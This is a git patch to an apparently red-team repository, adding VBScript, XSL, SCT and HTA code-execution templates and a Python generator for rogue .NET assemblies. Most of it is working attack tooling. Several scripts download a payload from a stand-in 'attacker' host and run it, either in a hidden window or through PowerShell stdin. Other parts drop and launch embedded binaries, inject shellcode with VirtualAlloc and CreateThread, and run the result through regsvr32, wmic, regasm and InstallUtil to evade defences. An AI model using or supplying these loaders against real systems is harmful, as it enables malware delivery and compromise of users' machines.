From 8b03b5ba409aa4d2e8fd8619758d2e562e883cd0 Mon Sep 17 00:00:00 2001 From: mgeeky Date: Thu, 7 May 2020 01:42:52 +0200 Subject: [PATCH] Added code-exec-templates and some additions to rogue-dot-net --- linux/toggleWaf.sh | 78 +- red-teaming/code-exec-templates/README.md | 136 +-- .../download-file-and-exec.vbs | 72 +- ...download-powershell-and-exec-via-stdin.vbs | 34 + .../drop-binary-file-and-launch.vbs | 47 ++ .../hello-world-jscript-xslt.xsl | 28 +- .../code-exec-templates/wmi-exec-command.vbs | 38 +- .../wscript-shell-code-exec.vbs | 26 +- .../wscript-shell-run-jscript-scriptlet.sct | 28 +- .../wscript-shell-run-jscript-xslt.xsl | 26 +- .../wscript-shell-run-vbscript.hta | 26 +- .../wscript-shell-stdin-code-exec.vbs | 38 +- red-teaming/rogue-dot-net/README.md | 178 ++-- .../rogue-dot-net/generateRogueDotNet.py | 774 +++++++++--------- 14 files changed, 806 insertions(+), 723 deletions(-) create mode 100644 red-teaming/code-exec-templates/download-powershell-and-exec-via-stdin.vbs create mode 100644 red-teaming/code-exec-templates/drop-binary-file-and-launch.vbs diff --git a/linux/toggleWaf.sh b/linux/toggleWaf.sh index 0b549f7..3600c3f 100644 --- a/linux/toggleWaf.sh +++ b/linux/toggleWaf.sh @@ -1,39 +1,39 @@ -#!/bin/bash - -modname=security2 -friendlyname=WAF - -if [ $# -ne 1 ]; then - echo "Usage: ./toggleWaf " - exit 1 -fi - -case $1 in - "on") - if [ $EUID -ne 0 ]; then - echo "[!] This function must be run as root. Use sudo." - exit 1 - fi - a2enmod $modname > /dev/null - systemctl reload apache2 - echo "[+] $friendlyname enabled." - ;; - - "off") - if [ $EUID -ne 0 ]; then - echo "[!] This function must be run as root. Use sudo." - exit 1 - fi - a2dismod $modname > /dev/null - systemctl reload apache2 - echo "[-] $friendlyname disabled." - ;; - - "status") - if a2query -m $modname 2> /dev/null | grep -q 'enabled' ; then - echo "[+] $friendlyname is enabled." - else - echo "[-] $friendlyname is disabled." - fi - ;; -esac +#!/bin/bash + +modname=security2 +friendlyname=WAF + +if [ $# -ne 1 ]; then + echo "Usage: ./toggleWaf " + exit 1 +fi + +case $1 in + "on") + if [ $EUID -ne 0 ]; then + echo "[!] This function must be run as root. Use sudo." + exit 1 + fi + a2enmod $modname > /dev/null + systemctl reload apache2 + echo "[+] $friendlyname enabled." + ;; + + "off") + if [ $EUID -ne 0 ]; then + echo "[!] This function must be run as root. Use sudo." + exit 1 + fi + a2dismod $modname > /dev/null + systemctl reload apache2 + echo "[-] $friendlyname disabled." + ;; + + "status") + if a2query -m $modname 2> /dev/null | grep -q 'enabled' ; then + echo "[+] $friendlyname is enabled." + else + echo "[-] $friendlyname is disabled." + fi + ;; +esac diff --git a/red-teaming/code-exec-templates/README.md b/red-teaming/code-exec-templates/README.md index b960788..bb19d52 100644 --- a/red-teaming/code-exec-templates/README.md +++ b/red-teaming/code-exec-templates/README.md @@ -1,67 +1,71 @@ -### A small collection of unobfuscated code-execution primitives in different languages - -A handy collection of small primitives/templates useulf for code-execution, downloading or otherwise offensive purposes. Whenever a quick sample of VBScript/JScript/C# code is needed - this directory should bring you one. - -Windows Script Host (WSH) subsystem can execute VBScript/JScript scritplets using two pre-installed interpreters: - -- `cscript.exe` - to be used for command-line, dynamic script execution. **Doesn't load AMSI** - -- `wscript.exe` - For general scripts execution. **This one loads AMSI** - - ---- - -#### VBScript - -- **`download-file-and-exec.vbs`** - Downloads a binary file using `Msxml2.ServerXMLHTTP`, stores it to the disk `Adodb.Stream` and then launches it via `Wscript.Shell Run` - -- **`wmi-exec-command.vbs`** - Example of VBScript code execution via WMI class' `Win32_Process` static method `Create` - -- **`wscript-shell-code-exec.vbs`** - Code execution via `WScript.Shell` in a hidden window. - -- **`wscript-shell-stdin-code-exec.vbs`** - Code execution via `WScript.Shell` in a hidden window through a command passed from StdIn to `powershell` - - ---- - -#### JScript - - ---- - -#### XSL - -XSL files can be executed in the following ways: - -- Using `wmic.exe`: -``` -wmic os get /format:"jscript-xslt-template.xsl" -``` - -Templates: - -- **`hello-world-jscript-xslt.xsl`** - A sample backbone for XSLT file with JScript code showing a simple message box. - -- **`wscript-shell-run-jscript-xslt.xsl`** - JScript XSLT with `WScript.Shell.Run` method - - - ---- - -#### COM Scriptlets - -Sample code execution with `regsvr32` can be following: -``` -regsvr32 /u /n /s /i:wscript-shell-run-jscript-scriptlet.sct scrobj.dll -``` - -- **`wscript-shell-run-jscript-scriptlet.sct`** - SCT file with JSCript code execution via `WScript.Shell.Run` - - ---- - -#### HTA - -HTA files are HTML Applications - +### A small collection of unobfuscated code-execution primitives in different languages + +A handy collection of small primitives/templates useulf for code-execution, downloading or otherwise offensive purposes. Whenever a quick sample of VBScript/JScript/C# code is needed - this directory should bring you one. + +Windows Script Host (WSH) subsystem can execute VBScript/JScript scritplets using two pre-installed interpreters: + +- `cscript.exe` - to be used for command-line, dynamic script execution. **Doesn't load AMSI** + +- `wscript.exe` - For general scripts execution. **This one loads AMSI** + + +--- + +#### VBScript + +- **`download-file-and-exec.vbs`** - Downloads a binary file using `Msxml2.ServerXMLHTTP`, stores it to the disk `Adodb.Stream` and then launches it via `Wscript.Shell Run` + +- **`download-powershell-and-exec-via-stdin`** - Downloads a Powershell script/commands from a given URL and passes them to _Powershell_'s `StdIn` + +- **`drop-binary-file-and-launch.vbs`** - Drops embedded base64 encoded binary file to disk and then launches it. + +- **`wmi-exec-command.vbs`** - Example of VBScript code execution via WMI class' `Win32_Process` static method `Create` + +- **`wscript-shell-code-exec.vbs`** - Code execution via `WScript.Shell` in a hidden window. + +- **`wscript-shell-stdin-code-exec.vbs`** - Code execution via `WScript.Shell` in a hidden window through a command passed from StdIn to `powershell` + + +--- + +#### JScript + + +--- + +#### XSL + +XSL files can be executed in the following ways: + +- Using `wmic.exe`: +``` +wmic os get /format:"jscript-xslt-template.xsl" +``` + +Templates: + +- **`hello-world-jscript-xslt.xsl`** - A sample backbone for XSLT file with JScript code showing a simple message box. + +- **`wscript-shell-run-jscript-xslt.xsl`** - JScript XSLT with `WScript.Shell.Run` method + + + +--- + +#### COM Scriptlets + +Sample code execution with `regsvr32` can be following: +``` +regsvr32 /u /n /s /i:wscript-shell-run-jscript-scriptlet.sct scrobj.dll +``` + +- **`wscript-shell-run-jscript-scriptlet.sct`** - SCT file with JSCript code execution via `WScript.Shell.Run` + + +--- + +#### HTA + +HTA files are HTML Applications + - **`wscript-shell-run-vbscript.hta`** - A backbone for `WScript.Shell.Run` via _VBScript_ \ No newline at end of file diff --git a/red-teaming/code-exec-templates/download-file-and-exec.vbs b/red-teaming/code-exec-templates/download-file-and-exec.vbs index e20366f..3f9ae67 100644 --- a/red-teaming/code-exec-templates/download-file-and-exec.vbs +++ b/red-teaming/code-exec-templates/download-file-and-exec.vbs @@ -1,38 +1,36 @@ -' -' Example of downloading a binary file from the URL, saving it to the -' local filesystem and then launching. -' -' Mariusz B. / mgeeky, -' (https://github.com/mgeeky) -' - -downloadURL = "http://attacker/payload.exe" -saveAs = "%TEMP%\foo.exe" -parameters = "" - -Dim sh: Set sh = CreateObject("WScript.Shell") -out = sh.ExpandEnvironmentStrings(saveAs) - -' STEP 1: Download File -Dim xhr: Set xhr = CreateObject("Msxml2.ServerXMLHTTP") -xhr.Open "GET", downloadURL, False -xhr.Send - -' STEP 2: Save binary file -If xhr.Status = 200 Then - With CreateObject("Adodb.Stream") - .Open - .Type = 1 - .write xhr.responseBody - .savetofile out, 2 - End With - - ' STEP 3: Execute file - cmd = out & " " & parameters - MsgBox cmd - sh.Run cmd, 0, False - -End If - -Set sh = Nothing +' +' Example of downloading a binary file from the URL, saving it to the +' local filesystem and then launching. +' +' Mariusz B. / mgeeky, +' (https://github.com/mgeeky) +' + +downloadURL = "http://attacker/payload.exe" +saveAs = "%TEMP%\foo.exe" +parameters = "" + +Dim sh: Set sh = CreateObject("WScript.Shell") +out = sh.ExpandEnvironmentStrings(saveAs) + +' STEP 1: Download File +Dim xhr: Set xhr = CreateObject("Msxml2.ServerXMLHTTP") +xhr.Open "GET", downloadURL, False +xhr.Send + +' STEP 2: Save binary file +If xhr.Status = 200 Then + With CreateObject("Adodb.Stream") + .Open + .Type = 1 + .write xhr.responseBody + .savetofile out, 2 + End With + + ' STEP 3: Execute file + cmd = out & " " & parameters + sh.Run cmd, 0, False +End If + +Set sh = Nothing Set xhr = Nothing \ No newline at end of file diff --git a/red-teaming/code-exec-templates/download-powershell-and-exec-via-stdin.vbs b/red-teaming/code-exec-templates/download-powershell-and-exec-via-stdin.vbs new file mode 100644 index 0000000..e333bd7 --- /dev/null +++ b/red-teaming/code-exec-templates/download-powershell-and-exec-via-stdin.vbs @@ -0,0 +1,34 @@ +' +' Example of downloading a binary file from the URL, saving it to the +' local filesystem and then launching. +' +' Mariusz B. / mgeeky, +' (https://github.com/mgeeky) +' + +scriptURL = "http://attacker/script.ps1" +launcher = "powershell -nop -w hid -Command -" + +Dim xhr: Set xhr = CreateObject("MSXML2.XMLHTTP") +xhr.Open "GET", scriptURL, False +xhr.Send + +Function bin2a(Binary) + Dim I,S + For I = 1 to LenB(Binary) + S = S & Chr(AscB(MidB(Binary,I,1))) + Next + bin2a = S +End Function + +If xhr.Status = 200 Then + With CreateObject("WScript.Shell") + With .Exec(launcher) + .StdIn.WriteLine bin2a(xhr.responseBody) + .StdIn.WriteBlankLines 1 + .Terminate + End With + End With +End If + +Set xhr = Nothing \ No newline at end of file diff --git a/red-teaming/code-exec-templates/drop-binary-file-and-launch.vbs b/red-teaming/code-exec-templates/drop-binary-file-and-launch.vbs new file mode 100644 index 0000000..9abe02a --- /dev/null +++ b/red-teaming/code-exec-templates/drop-binary-file-and-launch.vbs @@ -0,0 +1,47 @@ +' +' Example of dropping an embedded, base64 encoded binary file to the disk, +' decoding it and then launching. +' +' Mariusz B. / mgeeky, +' (https://github.com/mgeeky) +' + +saveFileAs = "%TEMP%\foo.exe" +launchParameters = "" + +' ============================================================= + +fileBuffer = "" + +' ============================================================= + +Function Base64Decode(ByVal vCode) + Set oNode = CreateObject("Msxml2.DOMDocument.3.0").CreateElement("base64") + oNode.dataType = "bin.base64" + oNode.text = vCode + Base64Decode = oNode.nodeTypedValue + Set oNode = Nothing +End Function + +Dim sh: Set sh = CreateObject("WScript.Shell") +out = sh.ExpandEnvironmentStrings(saveFileAs) + +With CreateObject("Adodb.Stream") + .Open + .Type = 1 + .write Base64Decode(fileBuffer) + .savetofile out, 2 +End With + +computer = "." +Set wmi = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" _ + & computer & "\root\cimv2") + +Set startup = wmi.Get("Win32_ProcessStartup") +Set conf = startup.SpawnInstance_ +conf.ShowWindow = 12 + +Set proc = GetObject("winmgmts:root\cimv2:Win32_Process") + +command = out & " " & launchParameters +proc.Create command, Null, conf, intProcessID \ No newline at end of file diff --git a/red-teaming/code-exec-templates/hello-world-jscript-xslt.xsl b/red-teaming/code-exec-templates/hello-world-jscript-xslt.xsl index a483e85..e4e5766 100644 --- a/red-teaming/code-exec-templates/hello-world-jscript-xslt.xsl +++ b/red-teaming/code-exec-templates/hello-world-jscript-xslt.xsl @@ -1,15 +1,15 @@ - - - - - + + + + + \ No newline at end of file diff --git a/red-teaming/code-exec-templates/wmi-exec-command.vbs b/red-teaming/code-exec-templates/wmi-exec-command.vbs index e917727..ff57376 100644 --- a/red-teaming/code-exec-templates/wmi-exec-command.vbs +++ b/red-teaming/code-exec-templates/wmi-exec-command.vbs @@ -1,20 +1,20 @@ -' -' This script uses WMI class' Win32_Process static method Create to -' execute given command in a hidden window (ShowWindow = 12). -' -' Mariusz B. / mgeeky, -' (https://github.com/mgeeky) -' - -command = "notepad.exe" -computer = "." - -Set wmi = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" _ - & computer & "\root\cimv2") - -Set startup = wmi.Get("Win32_ProcessStartup") -Set conf = startup.SpawnInstance_ -conf.ShowWindow = 12 - -Set proc = GetObject("winmgmts:root\cimv2:Win32_Process") +' +' This script uses WMI class' Win32_Process static method Create to +' execute given command in a hidden window (ShowWindow = 12). +' +' Mariusz B. / mgeeky, +' (https://github.com/mgeeky) +' + +command = "notepad.exe" +computer = "." + +Set wmi = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" _ + & computer & "\root\cimv2") + +Set startup = wmi.Get("Win32_ProcessStartup") +Set conf = startup.SpawnInstance_ +conf.ShowWindow = 12 + +Set proc = GetObject("winmgmts:root\cimv2:Win32_Process") proc.Create command, Null, conf, intProcessID \ No newline at end of file diff --git a/red-teaming/code-exec-templates/wscript-shell-code-exec.vbs b/red-teaming/code-exec-templates/wscript-shell-code-exec.vbs index f6c3d00..870257e 100644 --- a/red-teaming/code-exec-templates/wscript-shell-code-exec.vbs +++ b/red-teaming/code-exec-templates/wscript-shell-code-exec.vbs @@ -1,13 +1,13 @@ -' -' This script uses classic WScript.Shell Run method to -' execute given command in a hidden window (second param = 0) -' -' Mariusz B. / mgeeky, -' (https://github.com/mgeeky) -' - -command = "notepad.exe" - -With CreateObject("WScript.Shell") - .Run command, 0, False -End With +' +' This script uses classic WScript.Shell Run method to +' execute given command in a hidden window (second param = 0) +' +' Mariusz B. / mgeeky, +' (https://github.com/mgeeky) +' + +command = "notepad.exe" + +With CreateObject("WScript.Shell") + .Run command, 0, False +End With diff --git a/red-teaming/code-exec-templates/wscript-shell-run-jscript-scriptlet.sct b/red-teaming/code-exec-templates/wscript-shell-run-jscript-scriptlet.sct index afcdbfe..892392f 100644 --- a/red-teaming/code-exec-templates/wscript-shell-run-jscript-scriptlet.sct +++ b/red-teaming/code-exec-templates/wscript-shell-run-jscript-scriptlet.sct @@ -1,15 +1,15 @@ - - - - - + + + + + \ No newline at end of file diff --git a/red-teaming/code-exec-templates/wscript-shell-run-jscript-xslt.xsl b/red-teaming/code-exec-templates/wscript-shell-run-jscript-xslt.xsl index 04c017c..7f58813 100644 --- a/red-teaming/code-exec-templates/wscript-shell-run-jscript-xslt.xsl +++ b/red-teaming/code-exec-templates/wscript-shell-run-jscript-xslt.xsl @@ -1,14 +1,14 @@ - - - - - + + + + + \ No newline at end of file diff --git a/red-teaming/code-exec-templates/wscript-shell-run-vbscript.hta b/red-teaming/code-exec-templates/wscript-shell-run-vbscript.hta index e946d45..42b55bd 100644 --- a/red-teaming/code-exec-templates/wscript-shell-run-vbscript.hta +++ b/red-teaming/code-exec-templates/wscript-shell-run-vbscript.hta @@ -1,14 +1,14 @@ - - - - - - + + + + + + \ No newline at end of file diff --git a/red-teaming/code-exec-templates/wscript-shell-stdin-code-exec.vbs b/red-teaming/code-exec-templates/wscript-shell-stdin-code-exec.vbs index c1bb438..8264bcb 100644 --- a/red-teaming/code-exec-templates/wscript-shell-stdin-code-exec.vbs +++ b/red-teaming/code-exec-templates/wscript-shell-stdin-code-exec.vbs @@ -1,19 +1,19 @@ -' -' This script uses classic WScript.Shell Exec method to -' execute given command in a hidden window via StdIn passed to a dedicated -' launcher command (powershell.exe in this example). -' -' Mariusz B. / mgeeky, -' (https://github.com/mgeeky) -' - -command = "notepad.exe" -launcher = "powershell -nop -w hid -Command -" - -With CreateObject("WScript.Shell") - With .Exec(launcher) - .StdIn.WriteLine command - .StdIn.WriteBlankLines 1 - .Terminate - End With -End With +' +' This script uses classic WScript.Shell Exec method to +' execute given command in a hidden window via StdIn passed to a dedicated +' launcher command (powershell.exe in this example). +' +' Mariusz B. / mgeeky, +' (https://github.com/mgeeky) +' + +command = "notepad.exe" +launcher = "powershell -nop -w hid -Command -" + +With CreateObject("WScript.Shell") + With .Exec(launcher) + .StdIn.WriteLine command + .StdIn.WriteBlankLines 1 + .Terminate + End With +End With diff --git a/red-teaming/rogue-dot-net/README.md b/red-teaming/rogue-dot-net/README.md index 1b7d9b4..02ce5b5 100644 --- a/red-teaming/rogue-dot-net/README.md +++ b/red-teaming/rogue-dot-net/README.md @@ -1,90 +1,90 @@ -## Rogue .NET Assembly for Regsvcs/Regasm/InstallUtil Code Execution - -Follow below described steps to properly generate your source code and then compile it into a nice rogue .NET Assembly ready to be executed by: - -- [Regasm](https://lolbas-project.github.io/lolbas/Binaries/Regasm/) -- [Regsvcs](https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/) -- [InstallUtil](https://lolbas-project.github.io/lolbas/Binaries/Installutil/) - -### Step 1: Generate key.snk file - -``` -powershell -file build.ps1 -``` - -### Step 2: Generate source code file - -Included in this directory script is a helper utility allowing one to quickly generate desired csharp source code file to be used for further `csc` compilation. - -Usage: - -``` -python3 generateRogueDotNet.py --help - - :: Rogue .NET Source Code Generation Utility - To be used during Red-Team assignments to launch Powershell/Shellcode payloads via Regsvcs/Regasm/InstallUtil. - Mariusz B. / mgeeky, - -usage: .\generateRogueDotNet.py [options] - -positional arguments: - inputFile Input file to be embeded within C# code. May be either Powershell script, raw binary Shellcode or .NET Assembly (PE/EXE) file. - -optional arguments: - -h, --help show this help message and exit - -e, --exe Specified input file is an Mono/.Net assembly PE/EXE. WARNING: Launching EXE is currently possible ONLY WITH MONO/.NET assembly EXE/DLL files, not an ordinary native PE/EXE! - -r, --raw Specified input file is a raw Shellcode to be injected in self process in a separate Thread. -``` - -Sample use case: - -``` -python3 generateRogueDotNet.py -r notepad64.bin > program.cs - - :: Rogue .NET Source Code Generation Utility - To be used during Red-Team assignments to launch Powershell/Shellcode payloads via Regsvcs/Regasm/InstallUtil. - Mariusz B. / mgeeky, - -[?] File specified as raw Shellcode. - -``` - - -### Step 3: Compilate library .NET Assembly - -``` -%WINDIR%\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:rogue.dll /keyfile:key.snk program.cs -``` - -If you passed Powershell code to be launched in a .NET Runspace, then an additional assembly will have to be used to compile resulting source code properly - meaning System.Management.Automation.dll (provided with this script). Then proper compilation command will be: - -``` -%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /r:System.Management.Automation.dll /target:library /out:rogue.dll /keyfile:key.snk program.cs -``` - - -### Step 4: Code execution via Regsvcs, Regasm or InstallUtil: - -- x86: -``` -%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe rogue.dll -%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U rogue.dll - -%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe rogue.dll -%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U rogue.dll - -%WINDIR%\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll -%WINDIR%\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll -``` - -- x64: -``` -%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regasm.exe rogue.dll -%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U rogue.dll - -%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe rogue.dll -%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe /U rogue.dll - -%WINDIR%\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll -%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll +## Rogue .NET Assembly for Regsvcs/Regasm/InstallUtil Code Execution + +Follow below described steps to properly generate your source code and then compile it into a nice rogue .NET Assembly ready to be executed by: + +- [Regasm](https://lolbas-project.github.io/lolbas/Binaries/Regasm/) +- [Regsvcs](https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/) +- [InstallUtil](https://lolbas-project.github.io/lolbas/Binaries/Installutil/) + +### Step 1: Generate key.snk file + +``` +powershell -file build.ps1 +``` + +### Step 2: Generate source code file + +Included in this directory script is a helper utility allowing one to quickly generate desired csharp source code file to be used for further `csc` compilation. + +Usage: + +``` +python3 generateRogueDotNet.py --help + + :: Rogue .NET Source Code Generation Utility + To be used during Red-Team assignments to launch Powershell/Shellcode payloads via Regsvcs/Regasm/InstallUtil. + Mariusz B. / mgeeky, + +usage: .\generateRogueDotNet.py [options] + +positional arguments: + inputFile Input file to be embeded within C# code. May be either Powershell script, raw binary Shellcode or .NET Assembly (PE/EXE) file. + +optional arguments: + -h, --help show this help message and exit + -e, --exe Specified input file is an Mono/.Net assembly PE/EXE. WARNING: Launching EXE is currently possible ONLY WITH MONO/.NET assembly EXE/DLL files, not an ordinary native PE/EXE! + -r, --raw Specified input file is a raw Shellcode to be injected in self process in a separate Thread. +``` + +Sample use case: + +``` +python3 generateRogueDotNet.py -r notepad64.bin > program.cs + + :: Rogue .NET Source Code Generation Utility + To be used during Red-Team assignments to launch Powershell/Shellcode payloads via Regsvcs/Regasm/InstallUtil. + Mariusz B. / mgeeky, + +[?] File specified as raw Shellcode. + +``` + + +### Step 3: Compilate library .NET Assembly + +``` +%WINDIR%\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:rogue.dll /keyfile:key.snk program.cs +``` + +If you passed Powershell code to be launched in a .NET Runspace, then an additional assembly will have to be used to compile resulting source code properly - meaning System.Management.Automation.dll (provided with this script). Then proper compilation command will be: + +``` +%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /r:System.Management.Automation.dll /target:library /out:rogue.dll /keyfile:key.snk program.cs +``` + + +### Step 4: Code execution via Regsvcs, Regasm or InstallUtil: + +- x86: +``` +%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe rogue.dll +%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U rogue.dll + +%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe rogue.dll +%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U rogue.dll + +%WINDIR%\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll +%WINDIR%\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll +``` + +- x64: +``` +%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regasm.exe rogue.dll +%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U rogue.dll + +%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe rogue.dll +%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe /U rogue.dll + +%WINDIR%\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll +%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll ``` \ No newline at end of file diff --git a/red-teaming/rogue-dot-net/generateRogueDotNet.py b/red-teaming/rogue-dot-net/generateRogueDotNet.py index f78d3f8..58b3fe5 100644 --- a/red-teaming/rogue-dot-net/generateRogueDotNet.py +++ b/red-teaming/rogue-dot-net/generateRogueDotNet.py @@ -1,387 +1,387 @@ -#!/usr/bin/python3 -# -# Red-Teaming script that constructs C# code for Regsvcs/Regasm/InstallUtil code execution technique. -# -# Step 1: Generate source code file -# cmd> python3 generateRogueDotNet.py -r payload.bin > program.cs -# -# Step 2: Compilate library .NET Assembly -# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:rogue.dll /keyfile:key.snk program.cs -# -# if you passed Powershell code to be launched in a .NET Runspace, then an additional assembly will have to be used -# to compile resulting source code properly - meaning System.Management.Automation.dll (provided with this script). -# Then proper compilation command will be: -# -# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /r:System.Management.Automation.dll /target:library /out:rogue.dll /keyfile:key.snk program.cs -# -# Step 3: Code execution via Regsvcs, Regasm or InstallUtil: -# x86: -# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe rogue.dll -# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe rogue.dll - -# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U rogue.dll -# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U rogue.dll - -# cmd> %WINDIR%\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll -# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll -# x64: -# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe rogue.dll -# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regasm.exe rogue.dll - -# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe /U rogue.dll -# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U rogue.dll - -# cmd> %WINDIR%\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll -# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll -# -# Mariusz B. / mgeeky, -# - -import re -import os -import io -import sys -import gzip -import base64 -import string -import struct -import random -import binascii -import argparse - - -def getCompressedPayload(filePath): - out = io.BytesIO() - encoded = '' - with open(filePath, 'rb') as f: - inp = f.read() - - with gzip.GzipFile(fileobj = out, mode = 'w') as fo: - fo.write(inp) - - encoded = base64.b64encode(out.getvalue()) - - powershell = "$s = New-Object IO.MemoryStream(, [Convert]::FromBase64String('{}')); IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s, [IO.Compression.CompressionMode]::Decompress))).ReadToEnd();".format( - encoded.decode() - ) - return powershell - -def getSourceFileContents(payload, _format): - launchCode = '' - usings = '' - - if _format == 'exe': - - exeLaunchCode = string.Template(''' - public static void Execute() { - - string payload = "$payload2"; - byte[] decoded = System.Convert.FromBase64String(payload); - - Assembly asm = Assembly.Load(decoded); - MethodInfo method = asm.EntryPoint; - object instance = asm.CreateInstance(method.Name); - method.Invoke(instance, null); - - }''').safe_substitute( - payload2 = base64.b64encode(payload.encode()).decode() - ) - - - launchCode = exeLaunchCode - - elif _format == 'raw': - - foo = str(binascii.hexlify(payload), 'ascii') - fooarr = ['0x{}'.format(foo[i:i+2]) for i in range(0, len(foo), 2)] - encodedPayload = ' ' - - for i in range(len(fooarr)): - if i % 16 == 0 and i > 0: - encodedPayload += '\n ' - encodedPayload += '{}, '.format(fooarr[i]) - - encodedPayload = encodedPayload.strip()[:-1] - - shellcodeLoader = string.Template(''' - [DllImport("kernel32")] - private static extern IntPtr VirtualAlloc( - IntPtr lpAddress, UIntPtr dwSize, - UInt32 flAllocationType, - UInt32 flProtect - ); - - [DllImport("kernel32")] - private static extern bool VirtualFree( - IntPtr lpAddress, - UInt32 dwSize, - UInt32 dwFreeType - ); - - [DllImport("kernel32")] - private static extern IntPtr CreateThread( - UInt32 lpThreadAttributes, - UInt32 dwStackSize, - IntPtr lpStartAddress, - IntPtr param, - UInt32 dwCreationFlags, - ref UInt32 lpThreadId - ); - - [DllImport("kernel32")] - private static extern bool CloseHandle( - IntPtr hHandle - ); - - [DllImport("kernel32")] - private static extern UInt32 WaitForSingleObject( - IntPtr hHandle, - UInt32 dwMilliseconds - ); - - private static UInt32 MEM_COMMIT = 0x1000; - private static UInt32 PAGE_EXECUTE_READWRITE = 0x40; - private static UInt32 MEM_RELEASE = 0x8000; - - public static void Execute() { - - byte[] payload = new byte[$payloadSize] { - $payload2 - }; - - IntPtr funcAddr = VirtualAlloc(IntPtr.Zero, (UIntPtr)payload.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE); - Marshal.Copy(payload, 0, funcAddr, payload.Length); - IntPtr hThread = IntPtr.Zero; - UInt32 threadId = 0; - - hThread = CreateThread(0, 0, funcAddr, IntPtr.Zero, 0, ref threadId); - WaitForSingleObject(hThread, 0xFFFFFFFF); - - CloseHandle(hThread); - VirtualFree(funcAddr, 0, MEM_RELEASE); - - }''').safe_substitute( - payload2 = encodedPayload, - payloadSize = len(payload) - ) - - launchCode = shellcodeLoader - - else: - usings += ''' -using System.Management.Automation; -using System.Management.Automation.Runspaces; -''' - powershellLaunchCode = string.Template(''' - public static void Execute() { - - byte[] payload = System.Convert.FromBase64String("$payload2"); - string decoded = System.Text.Encoding.UTF8.GetString(payload); - - Runspace runspace = RunspaceFactory.CreateRunspace(); - runspace.Open(); - - Pipeline pipeline = runspace.CreatePipeline(); - pipeline.Commands.AddScript(decoded); - pipeline.Invoke(); - - runspace.Close(); - }''').safe_substitute( - payload2 = base64.b64encode(payload.encode()).decode() - ) - - launchCode = powershellLaunchCode - - - template = string.Template(''' -using System; -using System.Diagnostics; -using System.Reflection; -using System.Runtime.InteropServices; -using System.EnterpriseServices; -$usings - -/* - Author: Casey Smith, Twitter: @subTee - Customized by: Mariusz B. / mgeeky, - License: BSD 3-Clause - - Step 1: Create Your Strong Name Key -> key.snk - - $key = 